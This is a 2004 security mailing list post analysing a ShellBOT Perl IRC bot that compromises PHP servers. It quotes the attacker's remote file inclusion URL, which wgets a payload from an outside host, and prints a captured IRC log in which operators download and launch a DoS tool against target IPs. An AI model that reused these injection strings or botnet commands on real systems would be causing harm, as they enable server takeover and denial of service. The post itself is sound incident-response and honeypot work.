Security Incidents mailing list archives
Systems compromised with ShellBOT perl script - part 2
From: Kirby Angell <kangell () alertra com>
Date: Fri, 03 Sep 2004 18:37:52 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 (note: This is a follow up to "Systems compromised with ShellBOT perl script" posted on 20040901) Introduction - ------------ Two days ago we detected a strange Referer entry in our web logs. This morning we got almost the same Referer again: http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2 Attacking IP is still 63.227.76.25. Attack involves servers, probably PHP, that do not properly sanitize variables and can be tricked into executing shell commands. The attack downloads and executes a Perl script (.egg2). The Perl script sets its process name to "[httpd]" to help it blend into the Apache threads. It connects to an IRC channel: Server: irc.mzima.net:6667 Channel: #brdata (note: new channel from last time) Nickname: goober+random int The script listens for private messages that can instruct it to do simple portscans, DOS attacks, and execute shell commands with whatever permissions the web server has. This time I was more prepared and have gathered more data on the script and what the bad guys are using it for. I have packaged the data into a .tar.gz file if anyone wants a copy of the whole thing including scripts. Setup - ------------ I modified the .egg2 script to neuter its portscan and DOS functions. The functions are still there, but they don't actually make any connections to remote servers. A "sleep" command attempts to make it look like something happened though. I purposfully left the shell command functional so I could see what commands they would run and not have them get too suspicious. The script was put into a VMWare session with a RH9 install. iptables was configured to allow the outgoing 6667:tcp and to disallow just about everything else inbound and outbound. tcpdump was setup to capture all the traffic on the vmnet ethernet adapter outside of the VMWare session. Results - ------------- For several hours my rogue bot was undetected and captured at least one attempt to enlist it along with all the rest (not as many as last time; but several I notified 2 days ago) in an attack on a computer. Here is a summary of the private messages my bot received and responses (entries prefaced with -> are commands coming into the bot and those with <- are responses leaving the bot): - -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4 <- PRIVMSG #brdata :doze4: no process killed - -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4 <- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget http://members.lycos.co.uk/gookboy/doze4 <- PRIVMSG #brdata :--13:52:35-- http://members.lycos.co.uk/gookboy/doze4 <- PRIVMSG #brdata : => `doze4' <- PRIVMSG #brdata :Resolving members.lycos.co.uk... done. <- PRIVMSG #brdata :Connecting to members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused. - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4 <- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such file or directory - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 81.29.36.147 53 www.ibm.com - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4 - -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4 65.248.51.13 53 www.ibm.com <- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory So command sequence is: kill our program, delete our program, get new version of our program, instruct our program to attack. In hindsight it was a mistake to not allow out going connections to at least their Lycos server. It drew attention to me and a few hours later, before any other attacks were tried, I was booted and the channel locked again. Unfortunately it means that the IP address I used is now probably dead for recon on this attacker. I think they are unaware how I keep finding the channel they are using though. If I get another shot, I'll see if I can bounce the connection through another machine using a SSH tunnel. If someone wants to volunteer a computer for this purpose it would be most appreciated. doze4 - ------------ I downloaded the "doze4" program and found it to be an elf binary. Google didn't turn up the source code, but I have disassmbled it. I'm not one with Linux assembly language but its not terribly long and seems to be a pretty basic DOS app. Not terribly sure why they didn't just use the one built into the script, but there is probably a good reason. ~ doze4 identifies itself as: * * doze4 - written by phyton * * doze4 rOckz! evite hosts.. use ips! Usage: %s <ip> <porta> <spoof> <ip> : endereço que deseja f***r. (address that it desires to f***r) <porta> : porta aperta (coloque 0, que é rOckz) (door presses (places 0, that he is rOckz)) <spoof> : um ip para ser spoofado (sua mascara). (a to be spoofado IP (its masks)) doze4 as well as .egg2 was written by someone who speeks Portugese. Summary - ------------- The same IP was used to initiate the attack both times. I notified the owner of that IP yesterday, but never received a response. Tonight I will be going through the list of compromised machines and notifying as many as possible of the problem. The files: doze4 elf binary of DOS tool doze4.asm disassembled version of doze4 wget-doze4.cap tcpdump capture of IRC session egg2-live dangerous version of IRC bot egg2-neutered egg2 with portscan and DOS disabled (but SHELL access is still live) hkz.txt PHP injection script irclog.txt text output of IRC connection readme.txt this file are available in a .tar.gz file for anyone who requests it. Tuesday night my test server was attacked with a SYN flood; I expect worse this time so I've locked it down so it will just log everything. We don't put this kind of thing on our production web servers, so just shoot me an email at kangell () alertra com if you want the archive. - -- Thank you, Kirby Angell Get notified anytime your website goes down! http://www.alertra.com key: 9004F4C0 fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFBOQBQ21unUZAE9MARApnkAKCUicL19u64sXZUw4CHkybDmEJ1HQCeKKRj l/dzGuRlVQ7TneVqdErV+7c= =WY/A -----END PGP SIGNATURE-----
Current thread:
- Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
- Re: Systems compromised with ShellBOT perl script - part 2 ASI (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 nathan c. dickerson (Sep 19)